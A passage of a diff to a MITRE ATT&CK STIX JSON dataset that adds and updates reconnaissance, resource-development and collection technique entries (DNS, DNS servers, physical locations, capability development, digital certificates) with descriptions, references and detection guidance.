leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "id": "attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-27T02:27:31.090Z", + "created": "2020-10-02T14:55:43.815Z", + "x_mitre_contributors": [ + "Vinayak Wadhwa, Lucideus", + "Lee Christensen, SpecterOps", + "Toby Kohlenberg" + ], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" ] }, { @@ -6278,9 +7157,9 @@ "url": "https://attack.mitre.org/techniques/T1574/002" }, { - "external_id": "CAPEC-capec", + "external_id": "CAPEC-641", "source_name": "capec", - "url": "https://capec.mitre.org/data/definitions/capec.html" + "url": "https://capec.mitre.org/data/definitions/641.html" }, { "source_name": "About Side by Side Assemblies", @@ -6315,7 +7194,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-20T22:05:42.513Z", + "modified": "2020-10-17T15:15:27.807Z", "created": "2020-03-13T19:41:37.908Z", "x_mitre_defense_bypassed": [ "Anti-virus", @@ -6370,7 +7249,7 @@ "phase_name": "command-and-control" } ], - "modified": "2020-03-27T19:02:44.600Z", + "modified": "2020-10-21T16:26:34.196Z", "created": "2020-03-15T16:27:31.768Z", "x_mitre_contributors": [ "Jan Petrov, Citi" @@ -6379,11 +7258,10 @@ "x_mitre_is_subtechnique": true, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for DNS traffic to/from known-bad or suspicious domains.", "x_mitre_data_sources": [ - "DNS records", "Netflow/Enclave netflow", + "DNS records", "Process monitoring", "Process use of network", - "Netflow/Enclave netflow", "Packet capture" ], "x_mitre_platforms": [ @@ -6392,6 +7270,47 @@ "Windows" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1590.002", + "url": "https://attack.mitre.org/techniques/T1590/002" + }, + { + "source_name": "DNS Dumpster", + "url": "https://dnsdumpster.com/", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020." + }, + { + "source_name": "Circl Passive DNS", + "url": "https://www.circl.lu/services/passive-dns/", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "DNS", + "description": "Before compromising a victim, adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target\u2019s subdomains, mail servers, and other hosts.\n\nAdversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "id": "attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:02:39.701Z", + "created": "2020-10-02T15:47:10.102Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "external_references": [ { @@ -6443,6 +7362,134 @@ "Windows" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1583.002", + "url": "https://attack.mitre.org/techniques/T1583/002" + }, + { + "source_name": "Unit42 DNS Mar 2019", + "url": "https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/", + "description": "Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can be (ab)used by malicious actors. Retrieved October 3, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "DNS Server", + "description": "Before compromising a victim, adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.\n\nBy running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)", + "id": "attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-19T00:11:26.376Z", + "created": "2020-10-01T00:40:45.279Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1584.002", + "url": "https://attack.mitre.org/techniques/T1584/002" + }, + { + "source_name": "Talos DNSpionage Nov 2018", + "url": "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html", + "description": "Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020." + }, + { + "source_name": "FireEye DNS Hijack 2019", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html", + "description": "Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020." + }, + { + "source_name": "CiscoAngler", + "description": "Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017.", + "url": "https://blogs.cisco.com/security/talos/angler-domain-shadowing" + }, + { + "source_name": "Proofpoint Domain Shadowing", + "url": "https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows", + "description": "Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved October 16, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "Before compromising a victim, adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.\n\nBy compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)", + "name": "DNS Server", + "id": "attack-pattern--c2f59d25-87fe-44aa-8f83-e8e59d077bf5", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-19T01:22:53.922Z", + "created": "2020-10-01T00:54:30.869Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1596.001", + "url": "https://attack.mitre.org/techniques/T1596/001" + }, + { + "source_name": "DNS Dumpster", + "url": "https://dnsdumpster.com/", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020." + }, + { + "source_name": "Circl Passive DNS", + "url": "https://www.circl.lu/services/passive-dns/", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "DNS/Passive DNS", + "description": "Before compromising a victim, adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target\u2019s subdomains, mail servers, and other hosts.\n\nAdversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "id": "attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:19:40.584Z", + "created": "2020-10-02T16:57:45.044Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "revoked": true, "external_references": [ @@ -6668,13 +7715,13 @@ "phase_name": "impact" } ], - "modified": "2020-03-27T21:09:28.699Z", + "modified": "2020-10-14T14:52:11.708Z", "created": "2019-03-15T13:59:30.390Z", "x_mitre_is_subtechnique": false, "x_mitre_impact_type": [ "Availability" ], - "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.\n\nIn some cases, monitoring for unusual kernel driver installation activity can aid in detection.", + "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.\n\nIn some cases, monitoring for unusual kernel driver installation activity can aid in detection.", "x_mitre_data_sources": [ "Kernel drivers", "File monitoring", @@ -6806,7 +7853,7 @@ { "source_name": "Mandiant M-Trends 2020", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." } ], "object_marking_refs": [ @@ -6819,7 +7866,7 @@ "phase_name": "collection" } ], - "modified": "2020-06-24T18:59:16.039Z", + "modified": "2020-09-14T19:48:08.180Z", "created": "2017-05-31T21:30:58.938Z", "x_mitre_is_subtechnique": false, "x_mitre_contributors": [ @@ -6962,6 +8009,60 @@ "User" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1602", + "url": "https://attack.mitre.org/techniques/T1602" + }, + { + "source_name": "US-CERT-TA18-106A", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020." + }, + { + "source_name": "US-CERT TA17-156A SNMP Abuse 2017", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-156A", + "description": "US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco Advisory SNMP v3 Authentication Vulnerabilities", + "url": "https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3", + "description": "Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Data from Configuration Repository", + "description": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.\n\nAdversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)", + "id": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "modified": "2020-10-22T02:26:44.566Z", + "created": "2020-10-19T23:46:13.931Z", + "x_mitre_data_sources": [ + "Netflow/Enclave netflow", + "Network protocol analysis", + "Packet capture" + ], + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_detection": "Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)", + "x_mitre_platforms": [ + "Network" + ] + }, { "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" @@ -6983,7 +8084,7 @@ "source_name": "Atlassian Confluence Logging" } ], - "description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.\n\nAdversaries may also collect information from shared storage repositories hosted on cloud infrastructure or in software-as-a-service (SaaS) applications, as storage is one of the more fundamental requirements for cloud services and systems.\n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.", + "description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.\n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.", "name": "Data from Information Repositories", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "id": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", @@ -6994,18 +8095,15 @@ "phase_name": "collection" } ], - "modified": "2020-06-30T22:50:06.087Z", + "modified": "2020-10-12T12:16:55.085Z", "created": "2018-04-18T17:59:24.739Z", "x_mitre_is_subtechnique": false, - "x_mitre_version": "2.1", + "x_mitre_version": "3.0", "x_mitre_contributors": [ "Praetorian", "Milos Stojadinovic" ], "x_mitre_data_sources": [ - "Azure activity logs", - "AWS CloudTrail logs", - "Stackdriver logs", "OAuth audit logs", "Application logs", "Authentication logs", @@ -7021,9 +8119,6 @@ "Windows", "macOS", "SaaS", - "AWS", - "GCP", - "Azure", "Office 365" ] }, @@ -7255,6 +8350,11 @@ "external_id": "T1078.001", "url": "https://attack.mitre.org/techniques/T1078/001" }, + { + "external_id": "CAPEC-70", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/70.html" + }, { "source_name": "Microsoft Local Accounts Feb 2019", "url": "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts", @@ -7292,9 +8392,9 @@ "phase_name": "initial-access" } ], - "modified": "2020-03-23T21:37:34.567Z", + "modified": "2020-09-16T19:41:43.491Z", "created": "2020-03-13T20:15:31.974Z", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_permissions_required": [ "Administrator", @@ -7329,7 +8429,7 @@ { "source_name": "Mandiant M-Trends 2020", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." }, { "source_name": "AWS CloudTrail Search", @@ -7361,7 +8461,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-17T19:53:14.784Z", + "modified": "2020-09-14T19:55:23.113Z", "created": "2020-06-16T17:23:06.508Z", "x_mitre_detection": "The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs)", "x_mitre_data_sources": [ @@ -7447,6 +8547,232 @@ "macOS" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1591.001", + "url": "https://attack.mitre.org/techniques/T1591/001" + }, + { + "source_name": "ThreatPost Broadvoice Leak", + "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/", + "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020." + }, + { + "source_name": "DOB Business Lookup", + "url": "https://www.dobsearch.com/business-lookup/", + "description": "Concert Technologies . (n.d.). Business Lookup - Company Name Search. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine Physical Locations", + "description": "Before compromising a victim, adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).", + "id": "attack-pattern--ed730f20-0e44-48b9-85f8-0e2adeb76867", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:09:48.419Z", + "created": "2020-10-02T16:32:33.126Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1587", + "url": "https://attack.mitre.org/techniques/T1587" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + }, + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Develop Capabilities", + "description": "Before compromising a victim, adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)\n\nAs with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.", + "id": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-22T18:18:08.552Z", + "created": "2020-10-01T01:30:00.877Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1587.003", + "url": "https://attack.mitre.org/techniques/T1587/003" + }, + { + "source_name": "Splunk Kovar Certificates 2017", + "url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html", + "description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Digital Certificates", + "description": "Before compromising a victim, adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).\n\nAdversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).", + "id": "attack-pattern--1cec9319-743b-4840-bb65-431547bce82a", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-22T18:18:08.422Z", + "created": "2020-10-01T01:42:24.974Z", + "x_mitre_data_sources": [ + "SSL/TLS certificates" + ], + "x_mitre_detection": "Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1588.004", + "url": "https://attack.mitre.org/techniques/T1588/004" + }, + { + "description": "Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.", + "source_name": "DiginotarCompromise", + "url": "https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/" + }, + { + "source_name": "Let's Encrypt FAQ", + "url": "https://letsencrypt.org/docs/faq/", + "description": "Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved October 15, 2020." + }, + { + "source_name": "Splunk Kovar Certificates 2017", + "url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html", + "description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020." + }, + { + "source_name": "Recorded Future Beacon Certificates", + "url": "https://www.recordedfuture.com/cobalt-strike-servers/", + "description": "Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers. Retrieved October 16, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Digital Certificates", + "description": "Before compromising a victim, adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\n\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials 